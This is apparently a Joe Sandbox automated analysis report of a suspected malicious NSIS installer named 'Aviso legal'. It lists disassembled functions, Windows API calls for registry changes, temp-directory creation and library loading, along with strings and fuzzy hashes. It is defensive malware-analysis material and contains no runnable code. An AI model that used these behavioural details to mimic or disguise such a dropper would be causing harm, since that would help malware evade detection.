Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%$}8@
API String ID: 551687249-3683892814
Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Temp\nscAAC8.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid$C:\Users\user\AppData\Local\Temp\nscAAC8.tmp$C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll$Call
API String ID: 1941528284-686570185
Opcode ID: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll
API String ID: 1495540970-4120299463
Opcode ID: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

\, xrefs: 004068C2
UXTHEME, xrefs: 004068A3
%s%S.dll, xrefs: 004068E6

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Function 705B1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 705B1BFF: GlobalFree.KERNEL32(?), ref: 705B1E74
Part of subcall function 705B1BFF: GlobalFree.KERNEL32(?), ref: 705B1E79
Part of subcall function 705B1BFF: GlobalFree.KERNEL32(?), ref: 705B1E7E

GlobalFree.KERNEL32(00000000), ref: 705B18C5
FreeLibrary.KERNEL32(?), ref: 705B194B
GlobalFree.KERNELBASE(00000000), ref: 705B1970

Part of subcall function 705B243E: GlobalAlloc.KERNEL32(00000040,?), ref: 705B246F

Part of subcall function 705B2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,705B1896,00000000), ref: 705B28E0

Part of subcall function 705B1666: wsprintfW.USER32 ref: 705B1694

Strings

, xrefs: 705B1951

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: daf8e5250971ac891dd8e3751d34e5d77a38c5a872c1a55a1b476c3d58694f19
Instruction ID: bd3168cc8726e400070eeb6ef8a8baebc08f711f1983b2982c3fe75b5145718f
Opcode Fuzzy Hash: daf8e5250971ac891dd8e3751d34e5d77a38c5a872c1a55a1b476c3d58694f19
Instruction Fuzzy Hash: 3741B4724002899BCB919F20DC8DB9D3FAEBF05350F54456AF9069E285DB7CB8848B64

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscAAC8.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscAAC8.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscAAC8.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nscAAC8.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp
API String ID: 2655323295-16301701
Opcode ID: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406061
nsa, xrefs: 00406069

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nscAAC8.tmp, xrefs: 00402683
